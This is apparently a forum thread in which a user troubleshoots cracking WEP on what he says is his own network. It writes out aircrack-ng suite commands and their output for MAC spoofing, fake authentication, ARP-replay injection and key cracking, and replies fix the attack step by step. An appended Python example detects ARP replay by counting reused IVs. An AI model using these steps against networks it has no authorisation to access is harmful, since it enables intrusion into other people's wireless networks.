Thread: W/L card not injecting but is in supported card list

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    W/L card not injecting but is in supported card list

    Hey Everyone

    Second attempt .. so i cut the convo and just discuss the issue directly.

    After having some "wireless issues" i decided to look into things a bit deeper in order to learn about how to protect myself. I already learnt one thing. Block the mac address of 00:11:22:33:44:55. So i want to see how someone got into my system. OK ... so i'm using

    Backtrack 3 LiveCD (after spending a few hours doing USB, i found my BIOS didn't allow USB booting .. good lesson for the kiddies)
    Wireless card is a Dlink Air Plus Xtreme G DWL-G520 HW:B3 FW:4.30

    OK ... this is what i do ... and this is what i get back

    Open Shell
    -> airmon-ng
    wifi0 - atheros - madwifi-ng
    ath0 - atheros - madwifi-ng VAP (parent: wifi0)

    -> airmon-ng stop ath0
    wifi0 - atheros - madwifi-ng
    ath0 - atheros - madwifi-ng VAP (parent: wifi0) (VAP Destroyed)

    -> ifconfig wifi0 down (i tried ath0 but i get an error saying no such device) just goes to next prompt

    ->macchanger --mac 00:11:22:33:44:55 wifi0
    Current MAC: 00:13:46:xx:xx:xx
    Faked MAC: 00:11:22:33:44:55

    -> airmon-ng start wifi0
    wifi0 - Atheros - madwifi-ng
    ath0 - Atheros - madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

    ->airodump-ng ath0
    I find my network
    BSSID:00:15:xx:xx:xx:xx PWR:27 Beacons: 23 #data:0 #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP Essid:EBC

    -> airodump-ng -c 6 -w weppy -bssid 00:15:xx:xx:xx:xx ath0
    BSSID:00:15:xx:etc PWR:34 RXQ:100 Beacons:1500 (and counting) #data:70 (and counting slowly) #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP ESSID:EBC

    Opening a new shell leaving the other running i type
    -> aireplay-ng -1 0 -a 00:15:xx:etc -h 00:11:22:33:44:55 -e EBC ath0
    Sending Authentication Request (open System) [ACK]
    Authentication successful
    Sending Association Request [ACK]
    Association successful :-) (AID: 1)

    -- ISSUES START HERE --

    -> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
    Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
    Saving ARP requests in replay_arp-1203-020546.cap
    You should also start airodump-ng to capture replies
    Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)

    So this is meant to be the important packet injection that i read so many others have issues with ....

    now i did the check on my card and it should be working .. but it isn't .. the #data which i expect would be going up .. doesn't .. AND i don't get ARP numbers going up ....

    Any suggestions would be lovely ...

    Thanks guys.

    Aiban

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Quote Originally Posted by Aiban View Post
    -- ISSUES START HERE --

    -> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
    Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
    Saving ARP requests in replay_arp-1203-020546.cap
    You should also start airodump-ng to capture replies
    Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)

    So this is meant to be the important packet injection that i read so many others have issues with ....

    now i did the check on my card and it should be working .. but it isn't .. the #data which i expect would be going up .. doesn't .. AND i don't get ARP numbers going up ....

    Any suggestions would be lovely ...

    Thanks guys.

    Aiban
    Is there an active client connected to the AP while you are trying to perform the ARP-replay attack? Generally APs will not broadcast any ARP-requests unless there is at least one client connected.
    -Monkeys are like nature's humans.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    1

    Try to use wesside-ng instead of what you are doing

  4. #4
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    Hey mate - what does this mean

    Try to use wesside-ng instead of what you are doing

    In place of where? I'm in noobie area cause i'm just following other guides and my knowledge of backtrack doesn't extend beyond those tutes borders.

  5. #5
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Quote Originally Posted by Aiban View Post
    Hey mate - what does this mean

    Try to use wesside-ng instead of what you are doing

    In place of where? I'm in noobie area cause i'm just following other guides and my knowledge of backtrack doesn't extend beyond those tutes borders.
    Wesside-ng is an automated tool/script for cracking WEP. That being said, I have tried it a few times but prefer the manual approach.
    Quote Originally Posted by Aiban View Post
    It reads the packets .. and after a short wait, it said i got 1 ARP and the ACK and sent started moving like crazy, with the pps shifting from 499/500
    BUT ... every few seconds i would get this message
    "Notice: got a deauth/disassoc packet. Is the source MAC associated ?"

    Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.

    The other console screen shows the #data rapidly rising and at 30000 i used the
    -> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
    I failed after a minute and tells me it'll retry at another 5000 ivs - it has been going and well past 65000 on the next attempt before i aborted.

    I'm not sure what this deauth means, i don't know how to get the ARP higher which i assume is a goal to success, but i'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads but ARPS are slow and this deauth notice fills my screen.
    The error output you get means that you have been disassociated from the AP, which means that it will no longer accept the packets you inject. This is the reason why you notice that the IVs stop climbing as the AP will disregard your injected packets and not give you any response. The fix is however simple, just perform the fake authentication attack again each time this happens (aireplay-ng -1 0...), also make sure that you did not miss this step in the first place. The goal is not to get the ARP count to climb, actually you can crack WEP without ever obtaining a single ARP-request, what you want is for the #data (IVs) count to climb.

    Furthermore, you are using the -n 64 mode in aircrack-ng, which means that if the key isn't actually 64 bits long you will never find it regardless of the amount of packets you collect.
    -Monkeys are like nature's humans.

  6. #6
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    OK .. i can fix that .. probably ... but it's the only wireless machine i have .. but i got parts to build a quick system and dump some crappy netgear card i have lying around into it for the sake of this test.. but it is a lot of mucking around (i don't have enough monitors etc) so it'll be fun to try hahahah so i hope that this is correct (i'm not doubting of course lol) ... but thanks .. i'll give that a go

  7. #7
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    6

    OK ... after some scrambling .. i got a laptop to borrow from a friend .
    I set it up to use my Wireless - and this is what happens....

    aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0

    I started some web browsing and a free 1gb download from my ISP's homepage to make sure there was a constant flow of information.

    It reads the packets .. and after a short wait, it said i got 1 ARP and the ACK and sent started moving like crazy, with the pps shifting from 499/500
    BUT ... every few seconds i would get this message
    "Notice: got a deauth/disassoc packet. Is the source MAC associated ?"

    Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.

    The other console screen shows the #data rapidly rising and at 30000 i used the
    -> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
    I failed after a minute and tells me it'll retry at another 5000 ivs - it has been going and well past 65000 on the next attempt before i aborted.

    I'm not sure what this deauth means, i don't know how to get the ARP higher which i assume is a goal to success, but i'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads but ARPS are slow and this deauth notice fills my screen.

    Thanks for the help so far, it has pushed me further into this ... but need more pushing..

    Thank you
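
Added example (not part of any post in this thread), written from the access-point owner's side: ARP replay retransmits one captured frame unchanged, so the injecting station appears as a transmitter reusing a single WEP IV hundreds of times per second, like the roughly 500 pps reported above. The frame records, the `02:00:00:00:00:01` client and the IV values are constructed sample data, and the one-second window and threshold of 100 are assumptions to tune for a real network.

```python
from collections import Counter

# Constructed sample records: (timestamp_seconds, transmitter_mac, wep_iv_hex).
# A monitoring tool would extract these fields from captured 802.11 data frames.
def build_sample():
    frames = []
    # Ordinary client (made-up MAC): a fresh IV on every frame.
    for i in range(50):
        frames.append((i * 0.02, "02:00:00:00:00:01", f"{0x1A2B00 + i:06x}"))
    # Replaying station: the same frame, hence the same IV, at ~500 pps.
    for i in range(500):
        frames.append((i * 0.002, "00:11:22:33:44:55", "7f03c1"))
    return sorted(frames)


def find_replay_sources(frames, window=1.0, threshold=100):
    """Return {mac: peak_count} for transmitters that reuse a single IV at
    least `threshold` times inside one `window`-second bucket."""
    counts = Counter()
    for ts, mac, iv in frames:
        counts[(int(ts // window), mac, iv)] += 1

    peaks = {}
    for (_bucket, mac, _iv), n in counts.items():
        if n >= threshold:
            peaks[mac] = max(peaks.get(mac, 0), n)
    return peaks


if __name__ == "__main__":
    for mac, peak in find_replay_sources(build_sample()).items():
        print(f"possible ARP replay: {mac} reused one IV {peak}x in one window")
```

Counting repeats of one IV rather than raw frame rate keeps a busy but legitimate client, such as one running a large download, from triggering the alert.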
